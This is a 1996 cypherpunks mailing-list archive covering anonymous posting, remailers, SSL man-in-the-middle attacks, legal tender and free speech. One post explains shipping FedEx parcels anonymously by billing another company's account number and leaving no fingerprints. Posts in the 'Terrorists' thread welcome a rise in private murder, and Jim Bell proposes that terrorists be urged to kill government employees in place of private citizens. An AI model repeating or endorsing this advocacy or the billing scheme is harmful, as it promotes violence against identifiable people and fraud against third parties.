e.g. posting form on my site it does not send any extra information that cannot be gathered any other nefarious way. The only additional information they send is whatever they fill in the dialog boxes. an example of info-gathering that can be achieved by any webmaster can be found at: http://www.uiuc.edu/cgi-bin/info together with the web browser + privacy issue. The only information that I have the need to collect is the I.P. (internet protocol) address of the postee. The purpose of this being that I can prevent them posting to my site if they repeatedly post off-topic or abusive posts.
In the past I have used this to prevent stock touting on my website and have banned whole sub-domains. (since the i.p. address may be general to the sw region of ATT or AOL). This is all mentioned on the top of the post page (http://www.tradesmart.com/rumor/post.html) that people have to scroll through to get to the posting section. Other information that is automatically collected (by the web server) is the domain name/I.P. address of the people visiting the web site. This allows me to see who (in a very general sense) access my web site. This information is freely available to anyone visiting my website...and I frequently advertise this fact. You can obtain your own copy of the traffic report at this web site by going to: http://www.tradesmart.com/cgi-bin/surfreport.html just fill in your email address and wait. The results will be emailed to you. You do not need to wait for the reply..since the stats processing takes time. good luck on your endeavours and feel free to post something on the Rumor Mill. Whether anonymous or publicly. Martin Leach Webmaster of the Biotech Rumor Mill. Arthur E. Sowers (arthures at access.digex.net) wrote: : Folks, I decided to visit this web site and tell all of you a few things : you ought to keep in mind. : First, the review: Yes, the "Rumor Mill" is a sort-of web-site : "newsgroup". The majority of posts and responses that I saw (not counting : the archives) were by "anonymous" posters. A good many were not : particularly "hot" (such as "why is company 'X' stock dropping?" and some : inane comments). Some were cryptic (meaning to the average person, they : might be essentially meaningless). Most were very short (1-2 sentences). A : few posts did have some information that I downloaded for use later. One : or two mentioned lawsuits (patent infringement). : Second, the warning: The Rumor Mill lets you post anonymously (as far as I : could see, but I did not try it) but THAT DOES NOT MEAN THAT SOMEONE WILL : NOT KNOW WHO YOU ARE.
I don't know how the Rumor Mill is operated, but I : do know that websites CAN be configured to capture information about : browser users who access that site! They can get a large amount of : information about you including your name, email address, all sorts of : information about your domain & ISP, etc. Your anonymous post may appear : to everyone else as anonymous, but the sysop (webmaster) at that site : should be presumed to be capable of determining who you are. I myself have : seen website "hit statistics" and believe me, it all shows up. You should : look in your Web Browser directory for the file and note : that some web sites that you visit will put short lines of data into your : file. You might try to change the attributes on that file to "read only" : and see what happens. Sometimes it will thwart the web site, sometimes it : will give you an error message. As a matter of fact, I did click on one : button and my netscape security window opened up to warn me that the : channel to that site was not secure. What else is related to this? There : are a number of anonymous remailers out in cyberspace, but it has been : stated by a knowledgeable source that a number of them are being operated : by law enforcement agencies (presumably to troll for criminal activity). A : website which allows rumors to be posted anonymously, especially involving : commercial business details (i.e. proprietary) but carries at least : no disclaimer that the sysop or sponsors do not use hit statistics data : to correlate it with anonymous posters and thereby determine or attempt to : determine their identity is a website that I would avoid using. In the : worlds of politics, leaks, trial-balloons, rumor, innuendo, insinuations, : etc. are common and make for entertaining reading for those who enjoy it.
: But in the world of commerce, the wrong blip in the wrong place can lead : to lawsuits, prosecution (by, for example, the Securities and Exchange : Commission), and other personal information, identity, etc., to fall into : hands that I would hope smart people might think about before they make : posts. I have the feeling that a simple post to a newsgroup through a : remailer would be safer than an anonymous post to the Rumor Mill. At : least, I would get into the configuration dialog boxes on your web browser : and leave "your name" and "your email address" blank, or put in a dummy : name. But then, you can figure out that this is a way to also send forged : mail (there was a "fake mail" website about a year or two ago, but the : sysops eventually shut it down). There is in fact a website out there that : says it can be used for anonymous web browsing (and I expect at some time : in the future that they will start charging for its use [think for a : minute why these would exist and it will be obvious]), but where I have : that little snit of paper is buried on my desk with mountains of : uncollated paperwork (sorry). : What do they say about "buyer beware?" Caveat emptor? : Eh? : Art Sowers : ======= : On 29 Aug 1996, Linda St. James wrote: : > Do you want to have a little fun and perhaps learn something about the : > current state of the biotechnology industry? : > : > Have you a particular company you've been interested in that you'd like : > more information on -- but the "inside scoop" seems better than an : > official company profile? : > : > IF SO --- : > : > : > Please take a look at Dr. Martin Leach's BIOTECH RUMOR MILL, one of the : > most fascinating sites on the WWW for the biotechnologist. : > : > In this site, Martin goes to great lengths to have an "all in one : > location" center for biotechnology news. Whether it is the daily reports : > from PR Newswire, or his reader surveys, you are bound to find something : > of interest.
But, to prove that the internet imitates real life, some of : > the most interesting tidbits are pure rumor. : > : > In this site, you and your colleagues have an opportunity to post : > information in a completely anonymous fashion. Some of the biggest news in : > the biotechnology business comes out of the "Rumor Mill" before it hits : > the trade journals, or even the Wall Street Journal! Of course, you have : > to remember that in any forum where anyone can post anonymously, there is : > a certain amount of frivolity as well. But what fun! : > : > Search Masters International, an industry-leading search firm specializing : > in Biotechnology, Pharmaceuticals, and Medical Device industries, is now a : > sponsor of this site along with Research Diagnostics. : > : > Take a look at your earliest convenience: : > : > The Biotech Rumor Mill is at: http://www.tradesmart.com/rumor : > : > The Search Masters International home page is at: http://smi.bio.com/ : > : > Best regards, : > : > Linda St. James, Office Manager : > Search Masters International : > Five Hundred Foothills South, Suite #2 : > Sedona, AZ 86336 : > (520) 282-3553 Phone or (520) 282-5881 Fax : > email to lindasj at sedona.net : > : > --- Dr.Dimitri Vulis KOTM Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps From wombat at mcfeely.bsfs.org Tue Sep 10 00:38:33 1996 From: wombat at mcfeely.bsfs.org (Rabid Wombat) Date: Tue, 10 Sep 1996 15:38:33 +0800 Subject: Anonymous FedEx, was: What is the EFF doing exactly? In-Reply-To: Message-ID: On Mon, 9 Sep 1996, Steve Schear wrote: > >David Lesher wrote: > > >Try & mail an anonymous FedEx package. > I FedEx'd some packages w/ "rabid wombat" as the sender's name, and the local FedEx office's address as the return. The packages went through. International. Amazing. > Not a problem. You merely use the FedEx number of local company. 
Get > FedEx forms from an unmanned FedEx pick-up point, fill one in (using an > impact printer, if desired, to simulate the appearance of the pre-addressed > forms given to their regular customers), attach to parcel and drop it in > the box (no finger prints please). > > Works like a charm. > > > > PGP Fingerprint: FE 90 1A 95 9D EA 8D 61 81 2E CC A9 A4 4A FB A9 > --------------------------------------------------------------------- > Snoop Daty Data | Internet: azur at netcom.com > Grinder | Voice: 1-702-655-2877 > Sacred Cow Meat Co. | Fax: 1-702-658-2673 > 7075 W. Gowan Road, #2148 | > Las Vegas, NV 89129 | > --------------------------------------------------------------------- > > Just say NO to perscription DRUGS. > > > > From wombat at mcfeely.bsfs.org Tue Sep 10 00:39:40 1996 From: wombat at mcfeely.bsfs.org (Rabid Wombat) Date: Tue, 10 Sep 1996 15:39:40 +0800 Subject: take the pledge In-Reply-To: <199609080352.VAA15611@InfoWest.COM> Message-ID: Better late than never, I suppose. :) - r.w. On Sun, 8 Sep 1996, attila wrote: > Alright! it's a genuine PerryGram! I'll take the pledge; > I've never been able to answer Sternlight without being > significantly more offensive than usual! > > attila > > -- > one of the few things we all share: > the utter, corrosive contempt for our elected officials. > > > -------------------------------------------------------- > > In, on 07/19/96 > at 12:06 PM, "Perry E. Metzger" said: > > =Subject: take the pledge > > > =Look, folks, we all know that 99% of what David Sternlight posts is > =garbage. Why don't we all pledge not to answer any of his posts, and > =then he'll go away. If necessary, someone can be appointed to post a > =weekly "the views expressed by David are junk and we are deliberately > =not replying to them directly" message. > > =David has plenty of places to argue with the wind. We don't need to > =add this one. > > =I'd like to ask people to publically pledge that they will not reply > =to David's messages. 
This is such a pledge. > > =Perry > > > > From jleonard at divcom.umop-ap.com Tue Sep 10 00:49:22 1996 From: jleonard at divcom.umop-ap.com (Jon Leonard) Date: Tue, 10 Sep 1996 15:49:22 +0800 Subject: Crypto Anachy MUD In-Reply-To: <2.2.32.19960909183805.008b9c70@panix.com> Message-ID: <9609100510.AA06806@divcom.umop-ap.com> Duncan Frissell wrote: > Did anyone make the point (I gave up on the thread) that we already have a > great Crypto Anarchy MUD with lots of the coding already done. We call it > the Internet. Digital cash, strong crypto, remailers, everything. Tim May expressed doubt that it was worth the effort: Not much easier than the real thing, and not as good. That's the closest to your point, I think. > I have never been able to figure out why anyone would want to play games on > a computer in any case when the whole system is a game. Word processing, > spreadsheets, telecoms -- it's all a game. And they pay you to play it. I've never figured out why anyone would play games at all -- the whole universe is all a game too. For whatever reason, some people (including me) like to play games. I've been working on a MUD anyway, and the question is whether it would be interesting enough to add crypto-anarchy aspects to it to be worth the effort. Obviously you think not. There are a few significant differences: We don't have fully anonymous digital cash, and not everyone can issue it. Strong crypto isn't universally deployed. Remailers don't allow easy two-way traffic. Few employers are willing to pay pseudonymous entities. You don't get imprisoned or killed for too-risky behavior on a MUD. Running a MUD invites less unwelcome attention than do some of the services discussed on cypherpunks. Finally, a MUD has the potential to spread crypto-anarchic ideas to people who would not otherwise have considered them. It may be that I'm wasting my time, but I could come up with some useful new crypto protocol too.
> DCF Jon Leonard From Adamsc at io-online.com Tue Sep 10 00:52:09 1996 From: Adamsc at io-online.com (Adamsc) Date: Tue, 10 Sep 1996 15:52:09 +0800 Subject: FWD: remote help Message-ID: <19960910044954703.AAA197@IO-ONLINE.COM> This has the potential to be very useful. I do hope, however, that there are some safeguards against hackers. Just a "Allow access?" dialog would be a large deterrent. ==================BEGIN FORWARDED MESSAGE================== >Date: Mon, 9 Sep 1996 13:30:10 -0700 >Reply-To: OS/2 Users Discussion List >Sender: OS/2 Users Discussion List >From: James Ssemakula >Subject: FWD: remote help >X-To: os2-l at hearn.nic.surfnet.nl, os2users at vm1.mcgill.ca >To: Multiple recipients of list OS2USERS To: "os2news" Date: Wed, 04 Sep 96 12:49:35 -0500 Reply-To: "Terry Hamilton" Subject: OS2News: Remote Support Tool Featured In Merlin REMOTE SUPPORT TOOL FEATURED IN MERLIN WEST PALM BEACH, FLORIDA, September 3, 1996 --- International Software Solutions has announced that an IBM-only version of their product, Remote Services Management(TM) (R.S.M.) will be included in OS/2 Warp Version 4 (code-named Merlin). This innovative tool, called IBM Remote Support for OS/2, allows IBM service representatives to help users directly over the phone, much as an on-site Help Desk would. With the permission of the OS/2 user, a remote IBM service representative can now dial into the user's system, take control of the keyboard and screen, conduct training, run programs, edit files and, if necessary, reboot. IBM Remote Support for OS/2 is a functional subset of R.S.M., which was chosen by IBM from among several remote control tools. R.S.M. is a full function product allowing network support and administrative people to take control of client workstations. For the general user community, R.S.M. is used for help desk support, software installation and updating, training, and full access to an office computer from a remote laptop. 
Through an integrated Programming Script Language, R.S.M. can even be used to build complex LAN and WAN Management applications. R.S.M. was formerly known as PolyPM/2. According to Tim Guptill, Senior Vice President of International Software Solutions, USA, "We at I.S.S. are proud that we have been selected to provide IBM Remote Support for OS/2 for inclusion in the IBM Assistance Center - OS/2 Warp Version 4. Now, IBM Technical Support can directly access and control customer machines to perform Help Desk and diagnostic functions. This is a revolutionary step in providing a level of customer support as yet unavailable in the general software market". For more information on Remote Services Management, contact I.S.S. at their toll-free number (888) ISS-2-YOU, GO ISSLP on CompuServe (e-mail 104127,1754), or on the Web at http://www.iss2you.com. -0- 9/04/96 /CONTACT: Press: Christopher C. Canning, 888-ISS-2-YOU or 407-820-0802, ext. 210 or Fax: 407-820-0804 or CompuServe: 104127,1754/ ===================END FORWARDED MESSAGE=================== - "'Anonymity is bad,' says a source who wishes to remain anonymous." - Nuff' said. * Home: Chris Adams | http://www.io-online.com/adamsc/adamsc.htp * Autoresponder: send email w/subject of "send resume" or "send PGPKEY" * Work: cadams at acucobol.com | V.M. (619)515-4894 | (619)689-6579 * Member in good standing of the GNU whirled hors d'oeuvre From tcmay at got.net Tue Sep 10 01:02:44 1996 From: tcmay at got.net (Timothy C. May) Date: Tue, 10 Sep 1996 16:02:44 +0800 Subject: All debtes public and private Message-ID: At 8:36 PM 9/9/96, jbugden at smtplink.alis.ca wrote: >This may be a hopelessly naive question, but is it possible to refuse >payment in >cash? Is it really good for all debts public and private? > There is probably a FAQ on this, as it gets asked and debated so often. From my reading of too many posts on too many lists about this issue, here are some misc.
points:

* First, anyone may specify what form of payment they want to be paid in, in advance of a transaction. Alice may demand payment in gold, in platinum, in barrels of oil, or in Blatislavan Yarts. Bob is free to decline her terms. (A common example is a sign saying "No bills over $20 accepted." Thus, if Bob fills his gas tank and then says "Here's a thousand-dollar bill...I hope you have change," he cannot escape his debt simply because the gas station does not make change for $1000 bills. If there is no sign, and the $1K note is offered....well, I don't know what would happen. Maybe there's been a case like this... Certainly the debt is not discharged merely because the payment cannot be accepted at the time....)

* Second, once a debt has been incurred--as when a restaurant meal has been consumed, a gas tank filled, etc.--and absent any special arrangements for the payment to be in some special form, the debt is considered discharged if payment in legal tender (dollars) is offered. That is, the debtor can offer dollars. If the merchant demands Blatislavan Yarts, the State will not consider the debtor in default for not paying in Yarts. (Again, absent a contractual agreement.)

* Third, a merchant is free to not let a transaction go to completion at the point of sale (e.g., the cash register, for physical goods being purchased) if the form of payment is not acceptable to him. (The case of a gas tank already being filled, a restaurant meal already being eaten is more complicated, with an "implied contract" being involved. Absent signs or agreements clearly announced, the assumption is that dollars are the means of settlement.)

* Fourth, the main reason for the "legal tender for all debts public and private" statement appears to be linked to efforts to stamp out private, bank-issued currencies.

* Fifth, there are various books on alternative currencies, denationalization of money, and such issues.
Basically, trying to introduce a new currency is not likely to be strongly supported by the legal system. --Tim May We got computers, we're tapping phone lines, I know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^1,257,787-1 | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From jimbell at pacifier.com Tue Sep 10 01:31:17 1996 From: jimbell at pacifier.com (jim bell) Date: Tue, 10 Sep 1996 16:31:17 +0800 Subject: [WAS xs4all.nl] Terrorists Message-ID: <199609100549.WAA22794@mail.pacifier.com> At 02:29 PM 9/9/96 -0400, Duncan Frissell wrote: >At 01:49 AM 9/9/96 -0700, Timothy C. May wrote: >>And the net effect of crypto anarchy is to destabilize and marginalize >>central governments, which is a net positive effect. If some eggs get >>broken in the process, the biological imperative will generate more eggs. >>No big deal. > >Particularly since governments murdered 160 million in the last 100 years >while we civilians have only managed to murder a paltry 20 million or fewer. >A savings of 160 million deaths leaves a lot of room for a non-harmful >increase in private murder. We could increase the private murder rate by 8 >to 10 times and still break even. I think the analysis is even more attractive than these numbers would imply. Probably the victims of government were, on average, no more "worthy of death" than that of the average citizen. They were the soldiers killed in wars (many or most of whom were drafted), civilians bombed, the victims of oppression and holocaust, etc. More or less ordinary people, a cross-section of society. 
While it's harder to generalize about victims of private killing, probably a far higher probability were either the bad guys killed off by other bad guys, or the bad guys killed legitimately by the good guys. Even when they were "good guys killed by bad guys," in many cases it's due to fallout from drug laws, or people prevented from carrying guns for their own protection. >Note too that most terrorism is aimed at governments (even if practiced on >civilians). In the absence of government, terrorist incentives may be reduced. Normally efforts to reduce terrorism would be welcomed by the government. Wouldn't it be interesting to see their reaction to an organization which announces that there are too many innocent citizens who are becoming victims of terrorism, and publicly calls on these terrorists to direct their attacks to non-private individuals, possibly researching the matter and giving suggestions? I think the public would understand, after a little education, that the average terrorist doesn't really have any reason to want to kill a private citizen if a better alternative were presented. I don't suppose you'd ever see a conventional polling organization ask the public questions like, "would you prefer to see 200+ randomly-selected citizens die in an airplane bombing, or the deaths of 50 government employees most responsible for the Waco and Ruby Ridge incidents." Jim Bell jimbell at pacifier.com From tcmay at got.net Tue Sep 10 02:05:29 1996 From: tcmay at got.net (Timothy C. May) Date: Tue, 10 Sep 1996 17:05:29 +0800 Subject: Crypto Anachy MUD Message-ID: At 5:10 AM 9/10/96, Jon Leonard wrote: >Duncan Frissell wrote: >> Did anyone make the point (I gave up on the thread) that we already have a >> great Crypto Anarchy MUD with lots of the coding already done. We call it >> the Internet. Digital cash, strong crypto, remailers, everything. > >Tim May expressed doubt that it was worth the effort: Not much easier >than the real thing, and not as good. 
That's the closest to your point, >I think. .... >Finally, a MUD has the potential to spread crypto-anarchic ideas to people >who would not otherwise have considered them. > >It may be that I'm wasting my time, but I could come up with some useful >new crypto protocol too. Don't tar me with the "Tim said it was a waste of time" label. Rather, I said I thought it would be pretty tough to get a reasonable ontology, one with rich enough behaviors and reasonable incentives and disincentives. Simulations are an art...they were useful in nuclear war planning, where the degrees of freedom were constrained, and so on. I agree that various cryptographic and crypto anarchic constructs can be "faked" in a game (MUD) that cannot be reasonably implemented at this time in the real world. Note: Didn't Steve Jackson Games have something called "GURPS Cyberpunk" which was somewhat similar? Anyway, good luck and have fun. --Tim May We got computers, we're tapping phone lines, I know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^1,257,787-1 | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From benc at geocel.com Tue Sep 10 02:05:55 1996 From: benc at geocel.com (Ben Camp) Date: Tue, 10 Sep 1996 17:05:55 +0800 Subject: BoS: Can you trust your ISP ?? Message-ID: <2.2.32.19960910063040.006e5128@lithium> Any sort of Certificate authority based protocol is dumb. It's like RSAC charging 500 bucks for rating a web site. Nothing anyone does on the web is important enough to encrypt. Anyway, as far as SSL goes...we've all heard about how proactive Netscape is in preventing key comprimise. Its too late. 
Ben Camp At 06:49 PM 9/9/96 -0700, Eric Murray wrote: >I~nigo Gonzalez writes: >> >> Hello, >> I'm thinking about how can I get rid off this kind of attack *before* it >> happens. Can you please send me your comments about this? I don't know so >> much about the how SSL works, but I think this is something that can >> happen... > >[classic Man-in-the-Middle attack] > > >What you described is the Man In The Middle attack, often >abbreviated on these lists as MITM. The fact that there's >an abbreviation for it should indicate to you how often >it is discussed. However it's also one of the first >problems (besides the basic encryption) that protocol >designers think of. > >It's been taken care of in SSL3- the server's certificate >must be signed by a CA that the client trusts. Unless >the digital signature can be spoofed, and it probably >can't be, the client can be certain that the server certificate it got >is really from the server that it claims to be from. > >Assuming that RSA still can't be broken, the client can be sure >that the pre-master-key material that it sends to the server >(and which is the basis for the symmetric crypto session keys) >will not be compromised. > > >If you grab a copy of the SSL3 spec (from netscape's web site) >and read the appendicies there's more good stuff about possible >attacks and what's been done to counter them. > > > > >-- >Eric Murray ericm at lne.com ericm at motorcycle.com http://www.lne.com/ericm >Principal, LNE Consulting: SSL, crypto applications, Internet security. >PGP keyid:E03F65E5 fingerprint:50 B0 A2 4C 7D 86 FC 03 92 E8 AC E6 7E 27 29 AF > > > From schmidt at pin.de Tue Sep 10 02:18:06 1996 From: schmidt at pin.de (Stephan Schmidt) Date: Tue, 10 Sep 1996 17:18:06 +0800 Subject: Guns Don't Kill People, IP Does In-Reply-To: <199609091802.AA16555@crl5.crl.com> Message-ID: > > One thought : How many of you would support terrorist > > web server (say Oklahoma, TWA, Iran, Lybia, RAF, IRA, ...) ? 
> > > > -stephan > > Considering how none of the above incidents are connected in any way > to the internet, what do you mean? And what if there were bomb making Sorry for my bad English, perhaps I got misunderstood. Would you run a WWW site where the (say there were some) terrorist who shot down (a wild assumption too) the TWA plane claiming it was right and all people should fight 'evil America'. Because of your web site there are other bomb attacks in the US (or somewhere else, the country is not that important) (although it's of course impossible to prove that these bombings are 'inspired' by your web site). Would you support the freedom of speech in this way? And to those who misunderstood my posting: a. I support the freedom of speech. b. I'm not sure I can support freedom of speech in ALL circumstances. c. I wanted to know what other people in this mailing list thought. Would they support freedom of speech for everyone? Under all circumstances? (I hope you got my point of view now) d. I think (hope) I'm a cypherpunk. e. Don't mistake my opinion with the opinion of the German Government, which I tried to make clear (I would be the last to support the German Government.) -stephan From scrappo.reverb at juno.com Tue Sep 10 02:28:03 1996 From: scrappo.reverb at juno.com (A L) Date: Tue, 10 Sep 1996 17:28:03 +0800 Subject: talker In-Reply-To: Message-ID: <19960909.203925.7647.0.scrappo.reverb@juno.com> >Very possible. Try reading the alt.2600 newsgroup for about a week >and see >lists. "h3y, w0w, d00dz, th1s cyberpun|< li5t is way |<3\/\/L!" >(Translation: Hey, wow, dudes, this cyberpunk list is way cool! >for those of you who are asciially impaired :) > >--- > >Zach Babayco > >zachb at netcom.com <----- finger for PGP public key >http://www.geocities.com/SiliconValley/Park/4127 Don't forget |-|eY \/\/0\/\/ d00d$! m i 3LiT3 |\|0\/\/?
From schmidt at pin.de Tue Sep 10 02:35:16 1996 From: schmidt at pin.de (Stephan Schmidt) Date: Tue, 10 Sep 1996 17:35:16 +0800 Subject: ... subversive leftists In-Reply-To: <199609100157.SAA12409@web.azstarnet.com> Message-ID: > >As to the "Reichskommander," in our country, and on the Net, such jokes are > >not illegal. I rather suspect they are in Germany, either the DDR or the > >Western side. > > > >As to "tasteless and insulting," a matter of personal perspective. I find > >it helpful to call a spade a spade, and others apparently do as well. Perhaps you call a spade an axe. To all those who haven't got the point: a. I'm antifa. b. It's easy to say things when no one can get you. It's harder to say the truth in the face of a skin with a baseball racket. c. I hope I don't get killed for this :) > > Ja, Ja. Das ist gut. Ve make chust a little choke now. ^^^^^^^^^^^ Perhaps you meant: Ist ja gut ;) Was the Vance you quoted Jack Vance? The author ... Just curious. -stephan From schmidt at pin.de Tue Sep 10 02:38:51 1996 From: schmidt at pin.de (Stephan Schmidt) Date: Tue, 10 Sep 1996 17:38:51 +0800 Subject: [WAS xs4all.nl] Terrorists In-Reply-To: <0DR1TD79w165w@bwalk.dm.com> Message-ID: Perhaps my connection is only disrupted accidentally, but I can't access www.xs4all.nl from one account (the two others still work). IP tried : 194.109.6.100 SPG: What is the 'new' IP? (I hope you don't think I'm a spy for the German Government :) Perhaps this time we have to prove that it's impossible to block an IP/Web site, so that all govs get a clue about how inet works. Hmm, some may claim it's better that the government thinks they successfully restricted the access to those pages. I think they should know what they can't do.
-stephan From stewarts at ix.netcom.com Tue Sep 10 03:05:14 1996 From: stewarts at ix.netcom.com (Bill Stewart) Date: Tue, 10 Sep 1996 18:05:14 +0800 Subject: Test...sorry about this - Reply - Reply Message-ID: <199609100742.AAA18190@dfw-ix5.ix.netcom.com> At 04:07 PM 9/9/96 -0500, you wrote: >I subscribed just once, real name. Yep, the Welcome msg is ReallyTrulyFine[M]. > I reallytrulyread it. High-traffic, though, is relative. In light of >Z.B.'s post , I thought that maybe I , too, had a mail probem. Seriously, >thanks for the info. BTW, if it's too much of a flood, you can read it with a newsreader at nntp.hks.net # Thanks; Bill # Bill Stewart, +1-415-442-2215 stewarts at ix.netcom.com # # You can get PGP software outside the US at ftp.ox.ac.uk/pub/crypto From loki at infonex.com Tue Sep 10 03:34:49 1996 From: loki at infonex.com (Lance Cottrell) Date: Tue, 10 Sep 1996 18:34:49 +0800 Subject: One Time Reply Blocks (was Re: strengthening remailerprotocols) In-Reply-To: <199609092316.QAA24498@netcom6.netcom.com> Message-ID: At 4:19 PM -0700 9/9/96, Bill Frantz wrote: >On Sun, 8 Sep 1996, Lance Cottrell wrote: > >> Mixmaster prevents replay, so flooding multiple copies of a single message >> will not work. This is the reason Mixmaster has no reply block feature. I >> can see two ways in which replies can work safely. > >To paraphrase John Von Neumann, any system which uses reply blocks is in a >state of sin. By this I mean that if there is a chain pointing at you, a >sufficiently powerful attacker can walk down that chain and find you. > >Given that, I will join the state of sin by proposing a mechanism which >will allow Alice to receive a reply from Bob, but change her mind at any >time. The basic idea is to have a one-time reply block which either Bob or >Alice can send to. If Alice thinks that too much time has elapsed, and >powerful enemies are walking down her reply block chain, she can send >herself a reply and break the chain. 
(She might send a reply thru each >link in the chain to break all the links.) The reason the message is not resendable is that the remailers keeps track of the serial number of that header. If forced, the log of serial numbers could be deleted, and the operator would process the message. Unless you are assuming some key archived by each remailer for the reply block, then I think it will be possible to repair the chain. -Lance ---------------------------------------------------------- Lance Cottrell loki at obscura.com PGP 2.6 key available by finger or server. Mixmaster, the next generation remailer, is now available! http://www.obscura.com/~loki/Welcome.html or FTP to obscura.com "Love is a snowmobile racing across the tundra. Suddenly it flips over, pinning you underneath. At night the ice weasels come." --Nietzsche ---------------------------------------------------------- From molnard1 at nevada.edu Tue Sep 10 03:43:28 1996 From: molnard1 at nevada.edu (DAVID A MOLNAR) Date: Tue, 10 Sep 1996 18:43:28 +0800 Subject: What is the EFF doing exactly? In-Reply-To: <9608098423.AA842308610@smtplink.alis.ca> Message-ID: On Mon, 9 Sep 1996 jbugden at smtplink.alis.ca wrote: > This may be a hopelessly naive question, but is it possible to refuse payment in > cash? Is it really good for all debts public and private? > > James I think this was mentioned a while back. If I recall correctly, a business may not refuse cash for a debt already incurred, but may refuse to allow you to incur said debt. That is, while cash is legal tender, a business may still refuse it, on the principle that they may not be compelled to provide service to any person or class of persons. In this case, class of persons == those w/cash. So, no, if you already had a contract or obligation, they may not refuse payment in cash. They may try. However, walking up to a store counter or a FedEx depot is a different matter. 
One only has to wonder about restaurants which want to refuse cash...do you pay before eating, then? Ask for proof of credit before opening service? So far as I think... -David Molnar From Adamsc at io-online.com Tue Sep 10 04:53:10 1996 From: Adamsc at io-online.com (Adamsc) Date: Tue, 10 Sep 1996 19:53:10 +0800 Subject: What is the EFF doing exactly? Message-ID: <19960910083723906.AAJ105@IO-ONLINE.COM> On Mon, 9 Sep 1996 10:51:04 -0400, kamml at secret.org wrote: >>> Try and pay cash in most Fedex offices. >>I always do and as long as I have exact change I have never been >>hassled. >Fedex will not accept cash in New York City. I have tried to pay cash and >been refused. I have talked to customer service and confirmed that they >will not accept cash in NYC although they will elsewhere. You could try the "Really? Could I borrow a phone book for a minute? I need to get UPS's number." approach. It has been known to work... - "'Anonymity is bad,' says a source who wishes to remain anonymous." - Nuff' said. * Home: Chris Adams | http://www.io-online.com/adamsc/adamsc.htp * Autoresponder: send email w/subject of "send resume" or "send PGPKEY" * Work: cadams at acucobol.com | V.M. (619)515-4894 | (619)689-6579 * Member in good standing of the GNU whirled hors d'oeuvre From gary at systemics.com Tue Sep 10 05:29:43 1996 From: gary at systemics.com (Gary Howland) Date: Tue, 10 Sep 1996 20:29:43 +0800 Subject: What is the EFF doing exactly? In-Reply-To: <9608098423.AA842308610@smtplink.alis.ca> Message-ID: <32353B63.62319AC4@systemics.com> jbugden at smtplink.alis.ca wrote: > > This may be a hopelessly naive question, but is it possible to refuse payment in > cash? Is it really good for all debts public and private? ^^^^^ Legal tender is good for payment of debts (ie. a legal tender), but not necessarily good for *creating* those debts. Gary -- "Of course the US Constitution isn't perfect; but it's a lot better than what we have now." -- Unknown. 
pub 1024/C001D00D 1996/01/22 Gary Howland Key fingerprint = 0C FB 60 61 4D 3B 24 7D 1C 89 1D BE 1F EE 09 06 From rednax at asiapac.net Tue Sep 10 05:50:01 1996 From: rednax at asiapac.net (red) Date: Tue, 10 Sep 1996 20:50:01 +0800 Subject: Crypto Num Mum, Hmm Message-ID: <199609100927.RAA20720@gandalf.asiapac.net> Are perfect numbers of any use in cryptography? I have yet to come across the usage or application, let alone heard of it, but have there been any proposals? Thanks. -rednax- red_naxela at geocites.com "smile and the mirror smiles" From gary at systemics.com Tue Sep 10 05:59:18 1996 From: gary at systemics.com (Gary Howland) Date: Tue, 10 Sep 1996 20:59:18 +0800 Subject: Crypto Num Mum, Hmm In-Reply-To: Message-ID: <32353E6F.63DECDAD@systemics.com> Simon Spero wrote: > > It's kind of tempting to generate the key and certificate using this as q > and the previous largest as p, if only for machismo at keysignings :-) The machismo is that you know for sure your numbers are prime, rather than being 99.999999% confident that they are. It is not hard to generate prime numbers this large, it's just hard to prove they are really prime. (Somebody please correct me if I'm wrong about this). Gary -- "Of course the US Constitution isn't perfect; but it's a lot better than what we have now." -- Unknown. pub 1024/C001D00D 1996/01/22 Gary Howland Key fingerprint = 0C FB 60 61 4D 3B 24 7D 1C 89 1D BE 1F EE 09 06 From gary at systemics.com Tue Sep 10 06:11:33 1996 From: gary at systemics.com (Gary Howland) Date: Tue, 10 Sep 1996 21:11:33 +0800 Subject: Satellite Movement? In-Reply-To: <960909031224_102540.2453_HHV82-1@CompuServe.COM> Message-ID: <32354236.695678E2@systemics.com> Blak Dayz wrote: > > I was out buying groceries and after they scanned the shit through they > told me that all the ATMs in the City were out due to connection problems. So I > go home and start trying to scan for the shits and I can't find them.
If anyone > knows what the hell happened i would appreciate the details. I believe it may > have been a solar flare that caused the companies to redirect their satellites. > It would do me alot of help considering i had to pay CASH (i hate paper) for the ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ > stuff and i would like to complain to the fucking JPL and satt. operators about > them warning the public. Haven't been lurking long, have you? Gary -- "Of course the US Constitution isn't perfect; but it's a lot better than what we have now." -- Unknown. pub 1024/C001D00D 1996/01/22 Gary Howland Key fingerprint = 0C FB 60 61 4D 3B 24 7D 1C 89 1D BE 1F EE 09 06 From declan at eff.org Tue Sep 10 06:57:33 1996 From: declan at eff.org (Declan McCullagh) Date: Tue, 10 Sep 1996 21:57:33 +0800 Subject: TWA 800 - Serious thread. In-Reply-To: <32349A90.51BD@gte.net> Message-ID: Last night I started reading "Main Justice," by Pulitzer-winner Jim McGee and Brian Duffy, about the DoJ's recent history of organized crime/drug war fighting and wiretapping. The book describes how Federal agencies have been granted more leeway in terms of entrapment thanks mostly to a conservative Supreme Court. Scary stuff. -Declan On Mon, 9 Sep 1996, Dale Thorn wrote: > > Per the tendency of federal agencies to let it be publicly known that > they lie openly to trap suspects (and apparently this technique has been > OK'd for local enforcement as well): > > This is going to backfire on them (and us), and probably has already. > If govt. protects its "sources and methods", however nefarious, to the > extent that the public is never asked to assent to these methods (even > though a few of us know about them anyway), then the public doesn't have > to become overtly cynical about what's going on. 
